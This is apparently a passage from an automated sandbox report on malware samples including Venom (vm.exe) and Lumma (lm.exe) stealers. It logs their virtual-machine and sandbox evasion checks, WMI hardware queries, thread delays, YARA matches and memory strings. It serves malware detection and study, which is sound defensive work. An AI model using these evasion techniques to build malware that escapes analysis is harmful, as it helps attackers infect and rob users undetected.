                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeFile Queried: C:\INTERNAL\__empty
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(14).exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Roaming\ftejcedKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeSystem information queried: FirmwareTableInformation
                  Source: C:\Users\user\Desktop\7Y18r(14).exeAPI/Special instruction interceptor: Address: 7FF8418CE814
                  Source: C:\Users\user\Desktop\7Y18r(14).exeAPI/Special instruction interceptor: Address: 7FF8418CD584
                  Source: C:\Users\user\AppData\Roaming\ftejcedAPI/Special instruction interceptor: Address: 7FF8418CE814
                  Source: C:\Users\user\AppData\Roaming\ftejcedAPI/Special instruction interceptor: Address: 7FF8418CD584
                  Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: 1C0F25F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: 1C0F3D80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: 1C0F76E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: 2AC86500000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeMemory allocated: 2AC9FE60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 170000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 2A80000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 28A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 110000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 28F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeMemory allocated: 48F0000 memory reserve | memory write watch
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmnet.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmmouse.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_00007FF7C0971049 sldt word ptr [eax]32_2_00007FF7C0971049
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 420Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 984Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 610Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3881Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 799Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 812Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeWindow / User API: threadDelayed 1421
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9216
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWindow / User API: threadDelayed 4884
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeEvaded block: after key decisiongraph_17-1055
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-1048
                  Source: C:\Windows\explorer.exe TID: 2104Thread sleep time: -98400s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 2572Thread sleep time: -61000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 2104Thread sleep time: -388100s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7548Thread sleep count: 1421 > 30
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7596Thread sleep count: 66 > 30
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 1504Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 1816Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 4200Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7524Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7084Thread sleep time: -210000s >= -30000s
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7684Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 280Thread sleep time: -20291418481080494s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6464Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 3440Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 3172Thread sleep count: 4884 > 30
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe TID: 7680Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe TID: 6244Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\F6D9.exeCode function: 24_2_00007FF70B8D7000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF70B8D71AFh24_2_00007FF70B8D7000
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00BA1754h5_2_00BA1718
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00EE1754h17_2_00EE1718
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,5_2_00BA29E2
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 17_2_00EE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,17_2_00EE29E2
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeCode function: 5_2_00BA2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,5_2_00BA2B8C
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\753F.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXDaI.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000000E.00000000.1447298084.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                  Source: lm.exe, 00000026.00000003.2668754828.0000000003187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                  Source: explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
                  Source: B552.exe, 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of 